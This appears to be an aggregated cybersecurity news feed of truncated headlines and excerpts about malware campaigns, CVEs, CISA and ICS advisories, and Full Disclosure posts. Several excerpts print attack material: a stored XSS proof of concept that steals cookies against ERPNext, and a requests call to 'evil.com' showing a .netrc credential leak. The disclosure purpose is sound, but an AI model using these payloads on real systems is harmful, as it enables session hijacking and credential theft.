What comes to your mind when you think of Photoshop? A tool for editing and retouching photos –… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Experts argue the case for “communities of support” to boost SMB cyber-resilience – Read More –
Experts argue that CISOs should avoid product duplication and simplify their language to ensure budget is spent wisely – Read More –
Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems. According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments. “Chaos … Read More “Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads – The Hacker News” »
Agentic AI systems could threaten security and data privacy, unless organizations test each model and component – Read More –
The attacks on UK retailers are “a wake-up call” for the industry, said River Island’s Information Security Officer – Read More –
A phishing campaign spoofing Booking.com has been observed targeting the hospitality sector, using ClickFix to install malware – Read More –
Traditional data leakage prevention (DLP) tools aren’t keeping pace with the realities of how modern businesses use SaaS applications. Companies today rely heavily on SaaS platforms like Google Workspace, Salesforce, Slack, and generative AI tools, significantly altering the way sensitive information is handled. In these environments, data rarely appears as traditional files or crosses networks … Read More “Your SaaS Data Isn’t Safe: Why Traditional DLP Solutions Fail in the Browser Era – The Hacker News” »
Sophos has uncovered a scheme planting malicious code in 130+ GitHub repositories, targeting hackers and gamers – Read More –
Today, your internet presence is much more than just a website or social media profile, it’s like your… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Stolen devices are a bigger cause of data loss than stolen credentials or ransomware, according to a new Blancco study – Read More –
Several malicious packages have been uncovered across the npm, Python, and Ruby package repositories that drain funds from cryptocurrency wallets, erase entire codebases after installation, and exfiltrate Telegram API tokens, once again demonstrating the variety of supply chain threats lurking in open-source ecosystems. The findings come from multiple reports published by Checkmarx, … Read More “Malicious PyPI, npm, and Ruby Packages Exposed in Ongoing Open-Source Supply Chain Attacks – The Hacker News” »
Posted by Sanjay Singh on Jun 03 Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project: ———————————————————————— CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 ———————————————————————— Product: CloudClassroom PHP Project Vendor:… – Read More – Full Disclosure
Shift in cyberattack focus puts APAC region under growing pressure. – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Startups at Infosecurity Europe focus on attack surface management and improving security data, even as some new vendors avoid AI-led marketing – Read More –
Rapid7 found that 56% of all compromises in Q1 2025 resulted from the theft of valid account credentials with no MFA in place – Read More –
Calling cyber security professionals, culture specialists and leaders to drive uptake of new Cyber security culture principles. – Read More – NCSC Feed
Hewlett Packard Enterprise (HPE) has released security updates to address as many as eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. “These vulnerabilities could be remotely exploited to allow remote code execution, disclosure of information, server-side request forgery, authentication bypass, … Read More “HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass – The Hacker News” »
A new study by NordPass and NordStellar reveals the automotive industry is plagued by weak, reused, and common… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the internet. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the privileges associated with the … Read More “Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution – Cyber Security Advisories – MS-ISAC” »
Google’s June security update for Android devices contains 34 vulnerabilities, all of which the company designates as high-severity defects. The company didn’t disclose any actively exploited vulnerabilities. Attackers could exploit the most serious flaw — CVE-2025-26443 affecting the Android system — to achieve local escalation of privilege with no additional privileges required. Google said exploitation … Read More “Google addresses 34 high-severity vulnerabilities in June’s Android security update – CyberScoop” »
CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2025-21479 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability CVE-2025-21480 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability CVE-2025-27038 Qualcomm Multiple Chipsets Use-After-Free Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to … Read More “CISA Adds Three Known Exploited Vulnerabilities to Catalog – All CISA Advisories” »
Modern software development demands rapid delivery of high-quality applications that can adapt to changing business requirements and user… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Compliance automation provider Vanta confirms a software bug exposed private customer data to other users, impacting hundreds of… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.3 ATTENTION: Exploitable remotely/low attack complexity Vendor: Schneider Electric Equipment: Wiser AvatarOn 6K Freelocate, Wiser Cuadro H 5P Socket Vulnerability: Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’) 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to inject code or bypass authentication. … Read More “Schneider Electric Wiser Home Automation – All CISA Advisories” »
View CSAF 1. EXECUTIVE SUMMARY CVSS v4 4.6 ATTENTION: Low attack complexity Vendor: Schneider Electric Equipment: EcoStruxure Power Build Rapsody Vulnerability: Stack-based Buffer Overflow 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to achieve arbitrary code execution on the affected device. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Schneider Electric … Read More “Schneider Electric EcoStruxure Power Build Rapsody – All CISA Advisories” »
CISA released three Industrial Control Systems (ICS) advisories on June 3, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-153-01 Schneider Electric Wiser Home Automation ICSA-25-153-02 Schneider Electric EcoStruxure Power Build Rapsody ICSA-25-153-03 Mitsubishi Electric MELSEC iQ-F Series CISA encourages users and administrators to review newly released ICS … Read More “CISA Releases Three Industrial Control Systems Advisories – All CISA Advisories” »
View CSAF 1. EXECUTIVE SUMMARY CVSS v3 9.1 ATTENTION: Exploitable remotely/low attack complexity Vendor: Mitsubishi Electric Equipment: MELSEC iQ-F Series Vulnerability: Improper Validation of Specified Index, Position, or Offset in Input 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to read confidential information, cause a denial-of-service condition, or stop operations by … Read More “Mitsubishi Electric MELSEC iQ-F Series – All CISA Advisories” »
North Face, Cartier, and Next Step Healthcare are the latest victims in a string of cyberattacks compromising customer… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
CrowdStrike and Microsoft announced an agreement Monday to formally connect the different names each company uses for the same threat groups in their attribution analysis. The companies said the effort will clarify inconsistencies across the industry’s naming taxonomies and acknowledge when both companies identify the same threat groups. The alliance between the longstanding competitors doesn’t … Read More “CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution – CyberScoop” »
President Donald Trump’s pick to serve as national cyber director was endorsed by a collection of cyber experts days before a Senate panel will consider his nomination. The 24 people who signed the letter endorsing Sean Cairncross include former government officials and current industry leaders, many who served in Republican-led administrations but some who also served … Read More “Experts endorse Sean Cairncross for national cyber director ahead of Senate hearing – CyberScoop” »
Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware. The DomainTools Investigations (DTI) team said it identified “malicious multi-stage downloader Powershell scripts” hosted on lure websites that masquerade as Gitcode and DocuSign. … Read More “Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack – The Hacker News” »
Resellers and channel partners can add value, fill gaps in security teams and offer expertise in niche markets – Read More –
Effective cybersecurity played a key role in Ukraine’s drone attack on Russian strategic bombers, a leading government security expert has claimed – Read More –
Posted by Stefan Kanthak on Jun 03 Hi @ll, user group policies are stored in DACL-protected registry keys [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies] respectively [HKEY_CURRENT_USER\Software\Policies] and below, where only the SYSTEM account and members of the “Administrators” user group are granted write access. At logon the user’s registry hive “%USERPROFILE%\ntuser.dat” is loaded with exclusive (read, write and… … Read More “Defense in depth — the Microsoft way (part 89): user group policies don’t deserve tamper protection – Full Disclosure” »
Cybersecurity researchers have disclosed details of a critical security flaw in the Roundcube webmail software that has gone unnoticed for a decade and could be exploited to take over susceptible systems and execute arbitrary code. The vulnerability, tracked as CVE-2025-49113, carries a CVSS score of 9.9 out of 10.0. It has been described as a … Read More “Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users Run Malicious Code – The Hacker News” »
Silver Spring, Maryland, 3rd June 2025, CyberNewsWire – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Posted by Ron E on Jun 03 An authenticated user can inject malicious JavaScript into the user_image field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient sanitization, allowing stored script execution in the context of other authenticated users. *Proof of Concept:* POST … Read More “ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path – Full Disclosure” »
Posted by Ron E on Jun 03 An authenticated attacker can inject JavaScript into the bio field of their user profile. When the profile is viewed by another user, the injected script executes. *Proof of Concept:* POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: –host– profile_info=”bio”:””><img src=x onerror=alert(document.cookie)>” – Read More – Full Disclosure
Posted by Andrey Stoykov on Jun 03 # Exploit Title: IDOR “Change Password” Functionality – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ IDOR “Change Password” Functionality #1: Steps to Reproduce: 1. Login as user with low privilege and visit profile page … Read More “IDOR “Change Password” Functionality – adaptcmsv3.0.3 – Full Disclosure” »
Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS via File Upload – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS via File Upload #1: Steps to Reproduce: 1. Login with low privilege user and visit “Profile” … Read More “Stored XSS via File Upload – adaptcmsv3.0.3 – Full Disclosure” »
Posted by Qualys Security Advisory via Fulldisclosure on Jun 03 Qualys Security Advisory Local information disclosure in apport and systemd-coredump (CVE-2025-5054 and CVE-2025-4598) ======================================================================== Contents ======================================================================== Summary Mitigation Local information disclosure in apport (CVE-2025-5054) – Background – Analysis – Proof of concept Local information disclosure in systemd-coredump… – Read More – Full Disclosure
CISA is facing $495m budget cut, losing 1000 employees and reducing staff to 2324 – Read More –
Posted by Jacek Lipkowski via Fulldisclosure on Jun 03 Hi, I made a novel honeypot for worms called Youpot. Normally a honeypot will try to implement whatever service it thinks the attacker would like. For a high interaction or pure honeypot this is often impossible, because of the thousands of possibilities. Even a simple … Read More “Youpot honeypot – Full Disclosure” »
Posted by Housma mardini on Jun 03 Hi, I am submitting an exploit for *CVE-2019-9978*, a remote code execution vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2). *Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) *Date*: 2025-05-20 *Exploit Author*: Huseyin Mardinli *Vendor Homepage*: https://warfareplugins.com/ *Software Link*: https://wordpress.org/plugins/social-warfare/ … Read More “Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) – Full Disclosure” »
Posted by Juho Forsén via Fulldisclosure on Jun 03 The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get('http://example.com:@evil.com/') Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. … Read More “CVE-2024-47081: Netrc credential leak in PSF requests library – Full Disclosure” »
Posted by Michał Majchrowicz via Fulldisclosure on Jun 03 Security Advisory Vulnerabilities reported to vendor: March 13, 2025 Vendor requested additional information: March 20, 2025 Additional information provided to vendor: March 22, 2025 Vendor confirmed the reported issues but rejected them: March 31, 2025 Additional information provided to vendor: May 6, 2025 Vendor confirmed … Read More “Multiple Vulnerabilities in SAP GuiXT Scripting – Full Disclosure” »
Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS in “Description” Functionality – cubecartv6.5.9 # Date: 05/2025 # Exploit Author: Andrey Stoykov # Version: 6.5.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Visit “Account” > “Address Book” and choose “Edit” 2. In the … Read More “Stored XSS in “Description” Functionality – cubecartv6.5.9 – Full Disclosure” »